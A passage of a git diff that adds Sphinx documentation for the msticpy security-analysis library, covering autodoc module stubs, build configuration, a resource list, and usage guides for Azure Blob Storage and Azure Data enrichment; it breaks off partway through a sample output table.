+.. automodule:: msticpy.nbtools.security_alert
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.security\_alert\_graph module
+---------------------------------------------
+
+.. automodule:: msticpy.nbtools.security_alert_graph
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.security\_base module
+-------------------------------------
+
+.. automodule:: msticpy.nbtools.security_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.security\_event module
+--------------------------------------
+
+.. automodule:: msticpy.nbtools.security_event
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.ti\_browser module
+----------------------------------
+
+.. automodule:: msticpy.nbtools.ti_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.timeline module
+-------------------------------
+
+.. automodule:: msticpy.nbtools.timeline
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.timeline\_duration module
+-----------------------------------------
+
+.. automodule:: msticpy.nbtools.timeline_duration
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.timeline\_pd\_accessor module
+---------------------------------------------
+
+.. automodule:: msticpy.nbtools.timeline_pd_accessor
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.timeseries module
+---------------------------------
+
+.. automodule:: msticpy.nbtools.timeseries
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.user\_config module
+-----------------------------------
+
+.. automodule:: msticpy.nbtools.user_config
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.utility module
+------------------------------
+
+.. automodule:: msticpy.nbtools.utility
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.wsconfig module
+-------------------------------
+
+.. automodule:: msticpy.nbtools.wsconfig
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.nbtools
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.rst b/docs/source/api/msticpy.rst
new file mode 100644
index 000000000..cfdc27b69
--- /dev/null
+++ b/docs/source/api/msticpy.rst
@@ -0,0 +1,25 @@
+msticpy package
+===============
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.analysis
+   msticpy.common
+   msticpy.config
+   msticpy.data
+   msticpy.datamodel
+   msticpy.nbtools
+   msticpy.sectools
+   msticpy.vis
+
+Module contents
+---------------
+
+.. automodule:: msticpy
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.sectools.rst b/docs/source/api/msticpy.sectools.rst
new file mode 100644
index 000000000..8e3d17a35
--- /dev/null
+++ b/docs/source/api/msticpy.sectools.rst
@@ -0,0 +1,158 @@
+msticpy.sectools package
+========================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.sectools.tiproviders
+   msticpy.sectools.vtlookupv3
+
+Submodules
+----------
+
+msticpy.sectools.auditdextract module
+-------------------------------------
+
+.. automodule:: msticpy.sectools.auditdextract
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.base64unpack module
+------------------------------------
+
+.. automodule:: msticpy.sectools.base64unpack
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.cmd\_line module
+---------------------------------
+
+.. automodule:: msticpy.sectools.cmd_line
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.domain\_utils module
+-------------------------------------
+
+.. automodule:: msticpy.sectools.domain_utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.eventcluster module
+------------------------------------
+
+.. automodule:: msticpy.sectools.eventcluster
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.geoip module
+-----------------------------
+
+.. automodule:: msticpy.sectools.geoip
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.iocextract module
+----------------------------------
+
+.. automodule:: msticpy.sectools.iocextract
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.ip\_utils module
+---------------------------------
+
+.. automodule:: msticpy.sectools.ip_utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.proc\_tree\_build\_mde module
+----------------------------------------------
+
+.. automodule:: msticpy.sectools.proc_tree_build_mde
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.proc\_tree\_build\_winlx module
+------------------------------------------------
+
+.. automodule:: msticpy.sectools.proc_tree_build_winlx
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.proc\_tree\_builder module
+-------------------------------------------
+
+.. automodule:: msticpy.sectools.proc_tree_builder
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.proc\_tree\_schema module
+------------------------------------------
+
+.. automodule:: msticpy.sectools.proc_tree_schema
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.process\_tree\_utils module
+--------------------------------------------
+
+.. automodule:: msticpy.sectools.process_tree_utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.sectools\_magics module
+----------------------------------------
+
+.. automodule:: msticpy.sectools.sectools_magics
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.syslog\_utils module
+-------------------------------------
+
+.. automodule:: msticpy.sectools.syslog_utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tilookup module
+--------------------------------
+
+.. automodule:: msticpy.sectools.tilookup
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.vtlookup module
+--------------------------------
+
+.. automodule:: msticpy.sectools.vtlookup
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.sectools
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.sectools.tiproviders.rst b/docs/source/api/msticpy.sectools.tiproviders.rst
new file mode 100644
index 000000000..aefdba8d4
--- /dev/null
+++ b/docs/source/api/msticpy.sectools.tiproviders.rst
@@ -0,0 +1,109 @@
+msticpy.sectools.tiproviders package
+====================================
+
+Submodules
+----------
+
+msticpy.sectools.tiproviders.alienvault\_otx module
+---------------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.alienvault_otx
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.azure\_sent\_byoti module
+------------------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.azure_sent_byoti
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.greynoise module
+---------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.greynoise
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.http\_base module
+----------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.http_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.ibm\_xforce module
+-----------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.ibm_xforce
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.intsights module
+---------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.intsights
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.kql\_base module
+---------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.kql_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.open\_page\_rank module
+----------------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.open_page_rank
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.riskiq module
+------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.riskiq
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.ti\_provider\_base module
+------------------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.ti_provider_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.tor\_exit\_nodes module
+----------------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.tor_exit_nodes
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.tiproviders.virustotal module
+----------------------------------------------
+
+.. automodule:: msticpy.sectools.tiproviders.virustotal
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.sectools.tiproviders
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.sectools.vtlookupv3.rst b/docs/source/api/msticpy.sectools.vtlookupv3.rst
new file mode 100644
index 000000000..20fa5b8a2
--- /dev/null
+++ b/docs/source/api/msticpy.sectools.vtlookupv3.rst
@@ -0,0 +1,45 @@
+msticpy.sectools.vtlookupv3 package
+===================================
+
+Submodules
+----------
+
+msticpy.sectools.vtlookupv3.vt\_pivot module
+--------------------------------------------
+
+.. automodule:: msticpy.sectools.vtlookupv3.vt_pivot
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.vtlookupv3.vtfile\_behavior module
+---------------------------------------------------
+
+.. automodule:: msticpy.sectools.vtlookupv3.vtfile_behavior
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.vtlookupv3.vtlookupv3 module
+---------------------------------------------
+
+.. automodule:: msticpy.sectools.vtlookupv3.vtlookupv3
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.sectools.vtlookupv3.vtobject\_browser module
+----------------------------------------------------
+
+.. automodule:: msticpy.sectools.vtlookupv3.vtobject_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.sectools.vtlookupv3
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.vis.rst b/docs/source/api/msticpy.vis.rst
new file mode 100644
index 000000000..c559c9652
--- /dev/null
+++ b/docs/source/api/msticpy.vis.rst
@@ -0,0 +1,37 @@
+msticpy.vis package
+===================
+
+Submodules
+----------
+
+msticpy.vis.entity\_graph\_tools module
+---------------------------------------
+
+.. automodule:: msticpy.vis.entity_graph_tools
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.vis.matrix\_plot module
+-------------------------------
+
+.. automodule:: msticpy.vis.matrix_plot
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.vis.mp\_pandas\_plot module
+-----------------------------------
+
+.. automodule:: msticpy.vis.mp_pandas_plot
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.vis
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/blog_articles.rst b/docs/source/blog_articles.rst
new file mode 100644
index 000000000..e6beb6fca
--- /dev/null
+++ b/docs/source/blog_articles.rst
@@ -0,0 +1,80 @@
+Articles, Labs and other Resources
+==================================
+
+MSTICPy Video - Overview and Extending MSTICPy
+----------------------------------------------
+One hour talk introducing MSTICPy, showing data connectors,
+pivot functions and notebooklets.
+Second part shows how to extend MSTICPy by adding your own queries
+and Pivot Functions
+`Watch on YouTube <https://www.youtube.com/watch?v=m3YElHwZX1U&list=RDCMUCsMica-v34Irf9KVTh6xx-g&index=1>`__
+
+.. figure:: _static/launch-space.png
+   :alt: YouTube video of Microsoft Launch Space talk
+   :height: 2.0in
+
+   YouTube video of Microsoft Launch Space talk
+
+MSTICPy Lab
+-----------
+Try out MSTICPy and Notebooks in MyBinder.org. No installation necessary.
+`MSTICPy Lab <https://github.com/Azure-Samples/azure-python-labs/blob/main/9-MSTICPy/README.md>`__
+
+.. figure:: _static/msticpy-lab.png
+   :alt: MSTICPy lab on Azure Sample GitHub
+   :height: 2.0in
+
+   MSTICPy lab on Azure Sample GitHub
+
+Notebook resources from PyCon 2021 and LaunchSpace talk
+-------------------------------------------------------
+`GitHub repo <https://github.com/ianhelle/pycon2021>`__
+
+Blog articles on our Medium account
+-----------------------------------
+
+.. figure:: _static/msticpy-medium.png
+   :alt: MSTICPy articles on Medium.com
+   :height: 2.0in
+
+   MSTICPy articles on Medium.com
+
+`MSTICPy v1.0.0 Overview and Tour <https://msticpy.medium.com/msticpy-v1-0-0-and-jupyter-notebooks-in-azure-sentinel-an-update-ac2f6df61f9e?source=friends_link&sk=721420baba0796878bf6c1147a28512d>`__
+April 26, 2021
+
+`MSTICPy 1.0.0 Release <https://msticpy.medium.com/msticpy-1-0-0-release-1e8848e45653?source=friends_link&sk=2b5a422928890d2a31770f23a0bf86ca>`__
+April 18, 2021
+
+`MSTICPy v1.0 pre-release <https://msticpy.medium.com/msticpy-1-0-pre-release-6d6edc5df79c>`__
+March 17, 2021
+
+`Pivot Functions 0.9.0 release <https://msticpy.medium.com/msticpy-0-9-0-pivot-functions-2be851ae2001?source=friends_link&sk=b3ba3a1096c694854a11c2bbdae5333e>`__
+Feb 22, 2021
+
+`MSTICPy 0.8.8 release <https://msticpy.medium.com/msticpy-0-8-8-release-5e8fe28a77d6?source=friends_link&sk=4b3682409a3b266cde7e4d805e35b406>`__
+Oct 28, 2020
+
+`MSTICPy 0.8.0 release <https://msticpy.medium.com/msticpy-0-8-0-release-5e7a94e0f2f1?source=friends_link&sk=125ba48ad84f1ed462b92c22f66612d8>`__
+Sep 21, 2020
+
+`MSTIC Notebooklets <https://msticpy.medium.com/announcing-mstic-notebooklets-d32479bd07f?source=friends_link&sk=6cf84354153dcf86498bac84412788b0>`__
+Aug 17, 2020
+
+`MSTICPy 0.7.1 release <https://msticpy.medium.com/msticpy-0-7-0-1-release-758c5cbbf06d?source=friends_link&sk=a77c6479783e79439d6b2acfbf07ecf9>`__
+Aug 14, 2020
+
+`MSTICPy 0.6.1 release <https://msticpy.medium.com/msticpy-0-6-0-1-release-4b12e76099a7?source=friends_link&sk=5bfca0ae257d19800c1cad4d71cceced>`__
+Jul 2, 2020
+
+`MSTICPy 0.5.1 release <https://msticpy.medium.com/msticpy-0-5-1-release-107f531a738f?source=friends_link&sk=10d584982ae261b4cc090d72bf43939d>`__
+May 29, 2020
+
+`MSTICPy 0.5.0 release <https://msticpy.medium.com/msticpy-0-5-0-released-a1ebfc362a1?source=friends_link&sk=66640f711c88311bf737e031368d936d>`__
+May 14, 2020
+
+Notebook articles on Azure Sentinel Tech Community
+--------------------------------------------------
+
+`Various articles with on Jupyter notebooks in Azure Sentinel
+<https://techcommunity.microsoft.com/t5/azure-sentinel/bg-p/AzureSentinelBlog/label-name/Notebooks>`__
+that we and others have created.
\ No newline at end of file
diff --git a/docs/source/conf.py b/docs/source/conf.py
new file mode 100644
index 000000000..bd2fdb514
--- /dev/null
+++ b/docs/source/conf.py
@@ -0,0 +1,253 @@
+# -*- coding: utf-8 -*-
+#
+# Configuration file for the Sphinx documentation builder.
+#
+# This file does only contain a selection of the most common options. For a
+# full list see the documentation:
+# http://www.sphinx-doc.org/en/master/config
+
+# type: ignore
+
+# pylint: disable=invalid-name, missing-module-docstring, import-error
+
+# noqa D100
+
+# flake8: noqa
+
+# -- Path setup --------------------------------------------------------------
+
+# If extensions (or modules to document with autodoc) are in another directory,
+# add these directories to sys.path here. If the directory is relative to the
+# documentation root, use os.path.abspath to make it absolute, like shown here.
+#
+# import os
+# import sys
+# sys.path.insert(0, os.path.abspath('.'))
+import os
+import re
+import sys
+
+sys.path.insert(0, os.path.abspath(".."))
+
+# -- Project information -----------------------------------------------------
+
+project = "msticpy"
+# pylint: disable=redefined-builtin
+copyright = "2019, (c) Microsoft Corporation."
+author = "Ian Hellen"
+
+
+with open("../../msticpy/_version.py", "r", encoding="utf-8") as fd:
+    v_match = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE)
+    _ver = v_match.group(1) if v_match else "no version"
+
+# The full version, including alpha/beta/rc tags
+release = _ver
+# The short X.Y version
+version = _ver
+
+# -- General configuration ---------------------------------------------------
+
+# If your documentation needs a minimal Sphinx version, state it here.
+#
+# needs_sphinx = '1.0'
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+    "sphinx.ext.autodoc",
+    "sphinx.ext.autosummary",
+    "sphinx.ext.coverage",
+    "sphinx.ext.githubpages",
+    "sphinx.ext.napoleon",
+    "sphinx.ext.autosectionlabel",
+]
+
+autosectionlabel_prefix_document = True
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ["_templates"]
+
+# The suffix(es) of source filenames.
+# You can specify multiple suffix as a list of string:
+#
+# source_suffix = ['.rst', '.md']
+source_suffix = ".rst"
+
+# The master toctree document.
+master_doc = "index"
+
+# The language for content autogenerated by Sphinx. Refer to documentation
+# for a list of supported languages.
+#
+# This is also used if you do content translation via gettext catalogs.
+# Usually you set "language" from the command line for these cases.
+language = None
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = []
+
+# The name of the Pygments (syntax highlighting) style to use.
+pygments_style = None
+
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages.  See the documentation for
+# a list of builtin themes.
+#
+html_theme = "sphinx_rtd_theme"
+
+# Theme options are theme-specific and customize the look and feel of a theme
+# further.  For a list of options available for each theme, see the
+# documentation.
+#
+# html_theme_options = {}
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = [
+    "data_acquisition/_static",
+    "data_analysis/_static",
+    "getting_started/_static",
+    "visualization/_static",
+]
+
+# Custom sidebar templates, must be a dictionary that maps document names
+# to template names.
+#
+# The default sidebars (for documents that don't match any pattern) are
+# defined by theme itself.  Builtin themes are using these templates by
+# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
+# 'searchbox.html']``.
+#
+# html_sidebars = {}
+
+
+# -- Options for HTMLHelp output ---------------------------------------------
+
+# Output file base name for HTML help builder.
+htmlhelp_basename = "msticpydoc"
+
+
+# -- Options for LaTeX output ------------------------------------------------
+
+latex_elements = {
+    # The paper size ('letterpaper' or 'a4paper').
+    #
+    # 'papersize': 'letterpaper',
+    # The font size ('10pt', '11pt' or '12pt').
+    #
+    # 'pointsize': '10pt',
+    # Additional stuff for the LaTeX preamble.
+    #
+    # 'preamble': '',
+    # Latex figure (float) alignment
+    #
+    # 'figure_align': 'htbp',
+}
+
+# Grouping the document tree into LaTeX files. List of tuples
+# (source start file, target name, title,
+#  author, documentclass [howto, manual, or own class]).
+latex_documents = [
+    (master_doc, "msticpy.tex", "msticpy Documentation", "Ian Hellen", "manual")
+]
+
+
+# -- Options for manual page output ------------------------------------------
+
+# One entry per manual page. List of tuples
+# (source start file, name, description, authors, manual section).
+man_pages = [(master_doc, "msticpy", "msticpy Documentation", [author], 1)]
+
+
+# -- Options for Texinfo output ----------------------------------------------
+
+# Grouping the document tree into Texinfo files. List of tuples
+# (source start file, target name, title, author,
+#  dir menu entry, description, category)
+texinfo_documents = [
+    (
+        master_doc,
+        "msticpy",
+        "msticpy Documentation",
+        author,
+        "msticpy",
+        "Security tools for Python and Jupyter notebooks.",
+        "Security",
+    )
+]
+
+
+# -- Options for Epub output -------------------------------------------------
+
+# Bibliographic Dublin Core info.
+# epub_title = project
+
+# The unique identifier of the text. This can be a ISBN number
+# or the project homepage.
+#
+# epub_identifier = ''
+
+# A unique identification for the text.
+#
+# epub_uid = ''
+
+# A list of files that should not be packed into the epub file.
+epub_exclude_files = ["search.html"]
+
+
+# -- Extension configuration -------------------------------------------------
+autodoc_default_options = {
+    "members": None,
+    "inherited-members": None,
+    "ignore-module-all": None,
+}
+
+autoclass_content = "both"
+
+autoapi_dirs = ["../../msticpy"]
+
+autodoc_mock_imports = [
+    "adal",
+    "azure.common.exceptions",
+    "azure.core.exceptions",
+    "azure.core.pipeline",
+    "azure.core.pipeline.policies",
+    "azure.core.pipeline.transport",
+    "azure.identity",
+    "azure.keyvault",
+    "azure.keyvault.secrets",
+    "azure.mgmt.compute",
+    "azure.mgmt.compute.models",
+    "azure.mgmt.keyvault",
+    "azure.mgmt.keyvault.models",
+    "azure.mgmt.monitor",
+    "azure.mgmt.network",
+    "azure.mgmt.resource",
+    "azure.mgmt.resourcegraph",
+    "azure.mgmt.subscription",
+    "azure.storage",
+    "azure.storage.blob",
+    "IPython",
+    "keyring",
+    "Kqlmagic",
+    "matplotlib",
+    "matplotlib.pyplot",
+    "moz_sql_parser",
+    "msrest.authentication",
+    "msrestazure",
+    "statsmodels",
+    "scipy",
+    "sklearn",
+    "splunk-sdk",
+    "splunklib",
+    "seaborn",
+    "vt",
+    "vt_graph_api",
+]
diff --git a/docs/source/contributing.rst b/docs/source/contributing.rst
new file mode 100644
index 000000000..97e1b3d34
--- /dev/null
+++ b/docs/source/contributing.rst
@@ -0,0 +1,21 @@
+Contributing
+============
+
+For (brief) developer guidelines, see this wiki article
+`Contributor Guidelines <https://github.com/microsoft/msticpy/wiki/Contributor-guidelines>`__.
+
+This project welcomes contributions and suggestions. Most contributions
+require you to agree to a Contributor License Agreement (CLA) declaring
+that you have the right to, and actually do, grant us the rights to use
+your contribution. For details, visit https://cla.microsoft.com.
+
+When you submit a pull request, a CLA-bot will automatically determine
+whether you need to provide a CLA and decorate the PR appropriately
+(e.g., label, comment). Simply follow the instructions provided by the
+bot. You will only need to do this once across all repos using our CLA.
+
+This project has adopted the `Microsoft Open Source Code of
+Conduct <https://opensource.microsoft.com/codeofconduct/>`__. For more
+information see the `Code of Conduct
+FAQ <https://opensource.microsoft.com/codeofconduct/faq/>`__ or contact
+opencode@microsoft.com with any additional questions or comments.
diff --git a/docs/source/data_acquisition/AzureBlobStorage.rst b/docs/source/data_acquisition/AzureBlobStorage.rst
new file mode 100644
index 000000000..b44b117f2
--- /dev/null
+++ b/docs/source/data_acquisition/AzureBlobStorage.rst
@@ -0,0 +1,136 @@
+Reading from and writing to Azure Blob AzureBlobStorage
+=======================================================
+
+Description
+-----------
+
+Azure Blob Storage provides a simple and flexible way to store and access data of any kind.
+This makes it ideal for storing a range of data relating to security investigations, whether
+it be raw data to analyse or to store outputs and findings.
+
+This class wraps the `Azure Python SDK <https://github.com/Azure/azure-sdk-for-python>`_ and integrates it with other MSTICpy features.
+
+
+Import the module
+-----------------
+
+.. code:: ipython3
+
+    from msticpy.data.azure_blob_storage import AzureBobStorage
+
+See :py:mod:`azure_blob_storage<msticpy.data.azure_blob_storage>` for API details.
+
+Initialize  the class and connect
+---------------------------------
+
+Azure Blob Storage works on the basis of accounts, these are top level objects under which everything sits.
+When initializing `AzureBlobStorage` you need to provide the name of the account you wish to interact with.
+You then need to authenticate with the `connect` function. Authentication uses the `az_connect` feature of
+MSTICpy and the authentication methods can be customized by passing them to `connect` with the `auth_methods` keyword.
+
+.. code:: ipython3
+
+    abs = AzureBlobStorage("MyABSAccount")
+    abs.connect(auth_methods=["cli"])
+
+List Containers
+---------------
+
+`Containers` returns details on all the containers within an account.
+
+.. code:: ipython3
+
+    abs.containers()
+
+.. raw:: html
+
+    <table border="1" class="dataframe"><thead><tr style="text-align: right;"><th></th><th>name</th><th>last_modified</th><th>etag</th><th>public_access</th><th>has_immutability_policy</th><th>deleted</th><th>version</th><th>has_legal_hold</th><th>metadata</th></tr></thead><tbody><tr><th>0</th><td>papermill</td><td>2020-11-06 21:53:33+00:00</td><td>"0x8D8829E684FCAA2"</td><td>None</td><td>False</td><td>None</td><td>None</td><td>False</td><td>None</td></tr><tr><th>1</th><td>testcontainer</td><td>2020-11-19 15:22:38+00:00</td><td>"0x8D88C9EF3328E1F"</td><td>None</td><td>False</td><td>None</td><td>None</td><td>False</td><td>None</td></tr></tbody></table>
+
+See :py:mod:`containers<msticpy.data.azure_blob_storage.AzureBlobStorage.containers>` for API details.
+
+Create a Container
+------------------
+
+`create_container` creates a new container within the account.
+
+.. code:: ipython3
+
+    abs.create_container(conatiner_name="MyNewContainer")
+
+.. raw:: html
+
+    <table border="1" class="dataframe"><thead><tr style="text-align: right;"><th></th><th>name</th><th>last_modified</th><th>etag</th><th>public_access</th><th>has_immutability_policy</th><th>deleted</th><th>version</th><th>has_legal_hold</th></tr></thead><tbody><tr><th>0</th><td>MyNewContainer</td><td>2020-11-25 16:28:54+00:00</td><td>"0x8D8915F336764B3"</td><td>None</td><td>False</td><td>None</td><td>None</td><td>False</td></tr></tbody></table>
+
+See :py:mod:`create_container<msticpy.data.azure_blob_storage.AzureBlobStorage.create_container>` for API details.
+
+List Blobs
+----------
+
+`blobs` returns details on all the blobs in a container, due to the container scope it is required that you pass this function
+the name of the container you want to list blobs from.
+
+.. code:: ipython3
+
+    blobs = abs.blobs(container_name="MyNewContainer")
+    display(blobs[['name', 'container', 'snapshot', 'blob_type', 'last_modified']])
+
+.. raw:: html
+
+    <table border="1" class="dataframe"><thead><tr style="text-align: right;"><th></th><th>name</th><th>container</th><th>snapshot</th><th>blob_type</th><th>last_modified</th></tr></thead><tbody><tr><th>0</th><td>test-blob</td><td>MyNewContainer</td><td>None</td><td>BlobType.BlockBlob</td><td>2020-11-25 17:26:44+00:00</td></tr></tbody></table>
+
+See :py:mod:`blobs<msticpy.data.azure_blob_storage.AzureBlobStorage.blobs>` for API details.
+
+Write to a Blob
+---------------
+
+`upload_to_blob` writes data to a blob as specified. By default this will overwrite anything in the blob
+but you can set `overwrite=False` to stop an overwrite if the blob already has contents.
+The function returns True if the upload was successful.
+
+.. code:: ipython3
+
+    >abs.upload_to_blob(blob="Here is some test data", container_name="MyNewContainer", blob_name="test-blob")
+    True
+
+See :py:mod:`upload_to_blob<msticpy.data.azure_blob_storage.AzureBlobStorage.upload_to_blob>` for API details.
+
+Read from a Blob
+----------------
+
+`get_blob` returns the contents of the specified blob.
+
+.. code:: ipython3
+
+    > blob_contents = abs.get_blob(container_name="MyNewContainer", blob_name="test-blob")
+    > print(blob_contents)
+    b"Here is some test data"
+
+See :py:mod:`get_blob<msticpy.data.azure_blob_storage.AzureBlobStorage.get_blob>` for API details.
+
+Delete a Blob
+-------------
+
+`delete_blob` deletes a blob. By default this will also delete any blob snapshots.
+Returns True if blob is successfully deleted.
+
+.. code:: ipython3
+
+    >abs.delete_blob(container_name="MyNewContainer", blob_name="test-blob")
+    True
+
+See :py:mod:`delete_blob<msticpy.data.azure_blob_storage.AzureBlobStorage.delete_blob>` for API details.
+
+Generate a SAS Token for a Blob
+-------------------------------
+
+`get_sas_token` generates a `SAS token <https://docs.microsoft.com/azure/storage/common/storage-sas-overview>`_ for the specified blob.
+By default the token generated is valid for read access for 7 days but permissions can be modified with the
+`permission` keyword, and validity time-frame with the `start` and `end` keywords.
+The returned string is a full URI for the blob, with the SAS token appended.
+
+.. code:: ipython3
+
+    >abs.get_sas_token(container_name="MyNewContainer", blob_name="test-blob")
+    "https://myabsaccount.blob.core.windows.net/MyNewContainer/test-blob?SASTOKENSTRING
+
+See :py:mod:`get_sas_token<msticpy.data.azure_blob_storage.AzureBlobStorage.get_sas_token>` for API details.
diff --git a/docs/source/data_acquisition/AzureData.rst b/docs/source/data_acquisition/AzureData.rst
new file mode 100644
index 000000000..b8a69ae1b
--- /dev/null
+++ b/docs/source/data_acquisition/AzureData.rst
@@ -0,0 +1,320 @@
+Azure Data Enrichment
+=====================
+
+Description
+-----------
+
+This package contains functionality for enriching data regarding Azure
+host details with additional host details exposed via the Azure API.
+By providing an Azure Resource or Azure Subscription the package returns
+key contextual information regarding the Subscription or Resource.
+This package is primarily aimed at Azure IaaS resources but will work
+with any Azure Resource type.
+This feature is currently a work in progress and additional data
+enrichment capabilities will be added over time.
+
+:py:mod:`Azure Data API documentation<msticpy.data.azure_data>`
+
+
+
+
+Instantiating and Connecting with an Azure Data Connector
+---------------------------------------------------------
+
+See :py:class:`Azure Data <msticpy.data.azure_data.AzureData>`
+
+In order to connect to the Azure API and retrieve the required data
+we need to instantiate an Azure Data Connector and connect to the API.
+Authentication to the Azure API is handled via the azure_auth package.
+By default this package will attempt to use a prioritized list of authentication
+options. Available options are:
+
+    * 'env' - This checks for credentials stored as environment variables. If this option is selected valid credentials in msticpyconfig.yaml will be written as environment variable values and used.
+    * 'cli' - This attempts to use credentials generated by logging in via the
+      `Azure CLI <https://docs.microsoft.com/cli/azure/authenticate-azure-cli>`__
+      on the host running the notebook kernel.
+    * 'msi' - This attempts to use an
+      `Azure Managed Identity. <https://docs.microsoft.com/azure/active-directory/managed-identities-azure-resources/overview>`__
+    * 'interactive' - This prompts the browser to interactively login using the device's browser.
+
+By default `['env', 'cli', 'msi', 'interactive']` is used but you can provide an alternative
+list to `.connect` via the auth_methods parameter.
+
+.. code:: ipython3
+
+        az = AzureData()
+        az.connect(auth_methods=['cli','interactive'])
+
+
+Get Azure Subscription Details
+------------------------------
+
+See :py:meth:`get_subscriptions <msticpy.data.azure_data.AzureData.get_subscriptions>`
+
+Details about the subscription a resource is a member of can provide
+vital context to a security analyst when conducting an investigation.
+This package contains 2 functions to support this.
+
+AZURE_DATA_CONNECTOR.list_subscriptions() returns a pandas DataFrame
+with details of all the subscriptions within the tenant.
+
+.. code:: ipython3
+
+    az.get_subscriptions()
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
